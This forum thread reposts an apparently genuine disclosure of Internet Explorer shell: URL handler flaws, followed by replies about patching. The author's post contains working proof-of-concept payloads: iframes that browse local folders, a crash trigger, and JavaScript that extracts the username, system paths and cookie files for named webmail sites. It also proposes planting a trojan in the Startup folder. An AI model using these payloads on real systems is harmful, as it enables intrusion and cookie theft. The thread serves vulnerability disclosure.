Results 1 to 8 of 8

Thread: shell url handler security issues

  1. #1

    shell url handler security issues

    This is a copy of the document i sent to securityfocus.com two days ago hope you enjoy it.


    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1



    Internet explorer shell url handler :


    shell url handler security issues


    1)shell url handler vulnerability:
    there exists a security issue with the way internet explorer
    operates
    urls containing the shell: url handler this can be used to extract
    information from victims system which can be done by crafting html
    pages that contain the shell url as src or href values,this
    vulnerability allows access to certain shell folders for instance :




    shell:(shell folder name) ------>the urls generaly look like this
    you can find the shell folder names by searching the registry for
    "shellfolder"
    shell:windows
    shell:cookies
    shell:recent
    shell:system
    shell:Common AppData
    shell:Common Desktop
    shell:Common Documents
    shell:Common Favorites
    shell:Common Programs
    shell:Common Start Menu
    shell:Common Startup
    shell:Common Templates
    shell:Common Administrative Tools
    shell:CommonVideo
    shell:CommonPictures
    shell:Personal
    shell:local appdata
    shell:profile
    shell:Administrative Tools

    .......


    proof of concept:


    - - - - - -
    - - - - -
    - - - -
    - - -
    - -
    - ---------------------------------------------------------------------------
    <iframe id="Target" src='shell:windows' name="x" width="875"
    height="527">
    </iframe>
    - - - - - -
    - - - - -
    - - - -
    - - -
    - -
    - ---------------------------------------------------------------------------


    this vulnerability alone is not that much harmful for the execution
    of only limited files is possible (mainly those that ie normally can
    open: *.bmp,*.txt,*.log.*.jpeg,html,...)

    it is however possible to change folders or use these shell folders
    to get access to other folders on users system :

    proof of concept:

    - - - - - -
    - - - - -
    - - - -
    - - -
    - -
    - -------------------------------------------------------------------------------------------
    <iframe id="Target" src='shell:windows\system32\config\' name="x"
    width="875" height="527">
    </iframe>
    - - - - - -
    - - - - -
    - - - -
    - - -
    - -
    - -------------------------------------------------------------------------------------------

    this gives exploits that can write to users system the ability to
    create files in exact locations on user 's system.For instance
    saving
    a trojan horse in the common startup folder which would insure the
    start of this program anytime any of the users logon.


    2)clsids and shell url handler vulnerability:


    shell folders that ie has access to cannot only be accessed using
    their shell folder names but also by using clsids pointing to those
    folders:

    shell:::(clsid)
    clsids can be found here:HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID
    [folders]

    fonts shell:::{D20EA4E1-3957-11d2-A40B-0C5020524152}
    tasks shell:::{D6277990-4C6A-11CF-8D87-00AA0060F5BF}
    my computer shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}
    downloaded files shell:::{88C6C381-2E85-11D0-94DE-444553540000}
    search shell:::{E17D4FC0-5564-11D1-83F2-00A0C90DC849}
    {2559a1f0-21d7-11d4-bdaf-00c04f60b9f0}
    IE(homepage) shell:::{871C5380-42A0-1069-A2EA-08002B30309D}
    recycle bin shell:::{645FF040-5081-101B-9F08-00AA002F954E}
    network shell:::{208D2C60-3AEA-1069-A2D7-08002B30309D}
    control panel shell:::{21EC2020-3AEA-1069-A2DD-08002B30309D}
    printers shell:::{2227A280-3AEA-1069-A2DE-08002B30309D}
    web folders shell:::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}
    connection shell:::{992CFFA0-F557-101A-88EC-00DD010CCC48}
    my documents shell:::{450D8FBA-AD25-11D0-98A8-0800361B1103}
    administrative tools shell:::{D20EA4E1-3957-11d2-A40B-0C5020524153}
    briefcase shell:::{85BBD920-42A0-1069-A2E4-08002B30309D}
    scanners and cameras shell:::{E211B736-43FD-11D1-9EFB-0000F8757FCD}
    cabnet shell:::{0CD7A5C0-9F37-11CE-AE65-08002B2E1262}
    startup shell:::{48e7caab-b918-4e58-a94d-505519c795dc}
    common startup shell:::{0DF44EAA-FF21-4412-828E-260A8728E7F1}
    programs folder shell:::{7be9d83c-a729-4d97-b5a7-1b7313c39e0a}
    acvtivex folder shell:::{88C6C381-2E85-11D0-94DE-444553540000}
    .........

    Note: shell linking when combined with clsids on a local machine can
    give users the ability to bypass some restrictions:



    start>run>shell:::{6DFD7C5C-2451-11d3-A299-00C04F8EF6AF}<press
    enter>
    - - - - - - -->the folder options popsup



    proof of concept:

    - - - - - -
    - - - - -
    - - - -
    - - -
    - -
    - -------------------------------------------------------------------------------------------
    <iframe id="Target"
    src='shell:::{450D8FBA-AD25-11D0-98A8-0800361B1103}' name="x"
    width="875" height="527">
    </iframe>
    - - - - - -
    - - - - -
    - - - -
    - - -
    - -
    - -------------------------------------------------------------------------------------------


    changing directories or folders is also possible in this
    vulnerability.


    shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\c:
    shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\a:
    shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\d:
    shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\e:

    proof of concept:

    - - - - - -
    - - - - -
    - - - -
    - - -
    - -
    - -------------------------------------------------------------------------------------------
    <iframe id="Target"
    src='shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\c:' name="x"
    width="875" height="527">
    </iframe>
    - - - - - -
    - - - - -
    - - - -
    - - -
    - -
    - -------------------------------------------------------------------------------------------


    it is also possible to change between shell folders using "::\clsid"
    :



    proof of concept:

    - - - - - -
    - - - - -
    - - - -
    - - -
    - -
    - -------------------------------------------------------------------------------------------
    <iframe id="Target"
    src='shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}

    \::{7007ACC7-3202-11D1-AAD2-00805FC1270E}'
    name="x" width="875" height="527">
    </iframe>
    - - - - - -
    - - - - -
    - - - -
    - - -
    - -
    - -------------------------------------------------------------------------------------------


    If internet explorer is forced to open the " shell storage folder
    viewer " using this method it would cause internet explorer to crash
    which would close all open windows :


    proof of concept:


    - - - - - -
    - - - - -
    - - - -
    - - -
    - -
    - -------------------------------------------------------------------------------------------
    <iframe id="Target" src='{E773F1AF-3A65-4866-857D-846FC9C4598A}'
    name="x" width="875" height="527">
    </iframe>
    - - - - - -
    - - - - -
    - - - -
    - - -
    - -
    - -------------------------------------------------------------------------------------------


    programs like "Net meeting" can somehow be run using this method:



    proof of concept:

    - - - - - -
    - - - - -
    - - - -
    - - -
    - -
    - -------------------------------------------------------------------------------------------

    click


    - - - - - -
    - - - - -
    - - - -
    - - -
    - -
    - -------------------------------------------------------------------------------------------
    *it is also possible to start msn messenger but the fact that other
    programs can be run or not
    has not been tested.





    3)\shdoclc.dll\ vulnerability:

    when known files on user 's system is accessed using (shell:(shell
    folder name) or shell:::(clsid))
    internet explorer dose not open the file according to its filetype
    but reacts towards it as if it has been asked to download that file
    from the location this is correct as far as ie itself cannot open
    that file (*.gif,*.bmp,*.txt,... for instance *.txt is opened using
    notepad). When this happens the page that has tried to open the file
    causes an error which res://C:\WINHOLEZ\System32\shdoclc.dll\
    responds to, the url of the page generated by shdoclc.dll contains
    the location of that file which can reveal important information.


    proof of concept:

    IE 6
    IE 6+sp1

    - - - - - -
    - - - - -
    - - - -
    - - -
    - -
    - ---------------------------------------------------------------------------------------------
    <html>
    <head>
    </head>
    <body onload=setTimeout("exploit()",4*100);>
    <iframe id="Target" width="0" height="0"
    src="shell:profile\ntuser.ini" name="Target" scrolling="yes">
    </iframe>
    <SCRIPT language=JavaScript>
    function exploit(){
    loc=new String(Target.location);
    var len=loc.length
    var n=loc.indexOf("Settings")+9;
    var m=loc.indexOf("System32");
    preuser=new String(loc.substring(n,len));
    p=preuser.indexOf("\\");
    user=new String(preuser.substring(0,p));
    winloc=new String(loc.substring(6,m));
    q=winloc.indexOf("\\");
    rootdrive=new String(winloc.substring(0,q+1));
    targetwin=window.open("");
    targetwin.document.write("Username : "+user+"
    ");
    targetwin.document.write("root drive : "+rootdrive+"
    ")
    targetwin.document.write("location of windows folder :
    "+winloc+"
    ")
    targetwin.document.write("location of user profile
    :
    "+rootdrive+"Documents and Settings\\"+user+"\\");
    targetwin.document.write("

    Wallpaper :

    <img
    border=0 src='"+rootdrive+"Documents and Settings\\"+user+"\\Local
    Settings\\Application Data\\Microsoft\\Wallpaper1.bmp' width=30%
    height=30%>")
    targetwin.document.write("

    internet explorer wallpaper
    :


    <img border=0 src='"+rootdrive+"Documents and
    Settings\\"+user+"\\Application Data\\Microsoft\\Internet
    Explorer\\Internet Explorer Wallpaper.bmp' width=30%
    height=30%>

    ")
    }
    </SCRIPT>
    </body>
    </html>


    - - - - - -
    - - - - -
    - - - -
    - - -
    - -
    - ---------------------------------------------------------------------------------------------




    proof of concept:

    (reading cookies )

    IE 6 only
    *on IE6+sp1 the exploit won't work because cookies folder cannot be
    accessed,this is due to the fact that cookies folder is set to be
    part of restricted sites for which security level is high and the
    script won't be affective.


    - - - - - -
    - - - - -
    - - - -
    - - -
    - -
    - ---------------------------------------------------------------------------------------------

    <html>
    <head>
    </head>
    <body onload=setTimeout("exploit()",4*100);>
    <iframe id="Target" width="0" height="0"
    src="shell:profile\ntuser.ini" name="Target" scrolling="yes">
    </iframe>
    <SCRIPT language=JavaScript>
    function exploit(){
    loc=new String(Target.location);
    var len=loc.length
    var n=loc.indexOf("Settings")+9;
    var m=loc.indexOf("System32");
    preuser=new String(loc.substring(n,len));
    p=preuser.indexOf("\\");
    user=new String(preuser.substring(0,p));
    winloc=new String(loc.substring(6,m));
    q=winloc.indexOf("\\");
    rootdrive=new String(winloc.substring(0,q+1));
    targetwin=window.open("");
    targetwin.document.write("Username : "+user+"
    ");
    targetwin.document.write("root drive : "+rootdrive+"
    ")
    targetwin.document.write("location of windows folder :
    "+winloc+"
    ")
    targetwin.document.write("location of user profile
    :
    "+rootdrive+"Documents and Settings\\"+user+"\\");
    targetwin.document.write("

    Wallpaper :

    <img
    border=0 src='"+rootdrive+"Documents and Settings\\"+user+"\\Local
    Settings\\Application Data\\Microsoft\\Wallpaper1.bmp' width=30%
    height=30%>")
    targetwin.document.write("

    internet explorer wallpaper
    :


    <img border=0 src='"+rootdrive+"Documents and
    Settings\\"+user+"\\Application Data\\Microsoft\\Internet
    Explorer\\Internet Explorer Wallpaper.bmp' width=30%
    height=30%>

    ")

    var k=0;
    Targeturln=new Array("");
    Targeturl=new Array("");
    Targeturln[0]="yahoo"
    Targeturln[1]="hotmail"
    Targeturln[2]="antionline"
    do{
    Targeturl=Targeturln[k];
    contentx=new Array(x(Targeturl));
    if(contentx!="") {
    targetwin.document.write("

    <font size=5>Contents of the
    cookie file(s) related to
    "+Targeturl+"</font>



    <font>"+contentx+"</font>

    ");
    }
    if(contentx==""){
    targetwin.document.write("

    <font size=5>No files found
    related to "+Targeturl+"</font>


    ");
    }
    k++;
    }while(k<3);
    return false;
    }


    function x(url){
    content=new Array("");
    var i=0;
    do{
    cookie=window.open("shell:profile\\Local
    Settings\\Temp\\cookies\\"+user+"@"+url+"["+i+"].txt");
    if (cookie.document.body.innerText!="")
    content=content+"
    "+user+"@"+url+"["+i+"].txt
    :"+"

    "+cookie.document.body.innerText;
    cookie.close();
    i++;
    }while(i<=3);
    i=0;
    do{
    cookie=window.open("shell:profile\\Local
    Settings\\Temp\\cookies\\"+user+"@www"+url+"["+i+"].txt");
    if (cookie.document.body.innerText!="")
    content=content+"
    "+user+"@www."+url+"["+i+"].txt
    :"+"

    "+cookie.document.body.innerText;
    cookie.close();
    i++;
    }while(i<=3);
    return content;
    }


    </SCRIPT>
    </body>
    </html>

    - - - - - -
    - - - - -
    - - - -
    - - -
    - -
    - ---------------------------------------------------------------------------------------------


    author:Roozbeh afrasiabi

    roozbeh_afrasiabi@yahoo.com
    da_stone_cold_killer@yahoo.com

    all rights reserved

    Any changes to this document must be done under permission of the
    author,you can store or use this information as far as it has not
    been changed.




    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.2.1 (MingW32) - WinPT 0.7.96rc1

    iQD1AwUBQFdbIaPgVnQvvTzcAQIGywcAkoDq/q7rURJNAE8KJxu5zlsYHM+3JyM3
    rBDycy3Ik5vEzBJk6AWOkly02Xue2HU8Yys4V2B9ogi/c2xUOJ3vUj08zG86QReB
    aaGkJrV0UnOVHiTkVN42OQzTXPsEasSpdtJke9LufCMgEo9O2zjc5nB+nDSgaoNF
    BYs6hbyQhz/y3wk9O58LedDoBm5YTYOoqGyEyt3Kf8mfptUrXr2cUUqYl+dVxjxV
    kAIoR8U/DqoYZStYB8lH2J8PV5mtJWxIKpK4tJmW/jwrhSyvTR5Jv1hKKfKiVPJV
    RmF1gjRoCxc=
    =NaV3
    -----END PGP SIGNATURE-----

  2. #2
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,785
    how did securityfocus respond?
    Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”

  3. #3

    What?

    I would like to know how securityfocus responded and what is the ultimate goal, elminate the shell weakness?

  4. #4
    Senior Member Maestr0's Avatar
    Join Date
    May 2003
    Posts
    604
    What operating systems and builds of IE have you tested? I can't get IE to accept the shell: protocol. I remember reading about something like this with IE 5, it has something to do with explorer.exe I think.

    -Maestr0
    \"If computers are to become smart enough to design their own successors, initiating a process that will lead to God-like omniscience after a number of ever swifter passages from one generation of computers to the next, someone is going to have to write the software that gets the process going, and humans have given absolutely no evidence of being able to write such software.\" -Jaron Lanier

  5. #5
    Originally posted here by Tedob1
    how did securityfocus respond?
    http://www.securityfocus.com/bid/9628

    would like to know how securityfocus responded and what is the ultimate goal, elminate the shell weakness?
    well no solution from securityfocus but it seems like fully patched systems are not vulnerable by fully patched i mean you have to patch both the operating system and ie,that is what guys at secunia told me.

  6. #6
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,785
    some reaally nice work BTW. what patch fixes it. that is how far back is "unprotected"?
    Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”

  7. #7
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,785
    i just noticed that this is a tutorial...so what brought you to these conclusions or what made you investigate this in particular?
    Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”

  8. #8
    some reaally nice work BTW. what patch fixes it. that is how far back is "unprotected"?
    frankly i ain't know , even those gurus @secunia and securityfocus got a little bit mixed up with this i should have sent this to microsoft at first place they give you more info of what patch fixes what and so on


    i just noticed that this is a tutorial...so what brought you to these conclusions or what made you investigate this in particular?
    i had known about it for a long time but never thought of reporting it (don't ask why) even the information i have shared here is not the whole thing.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •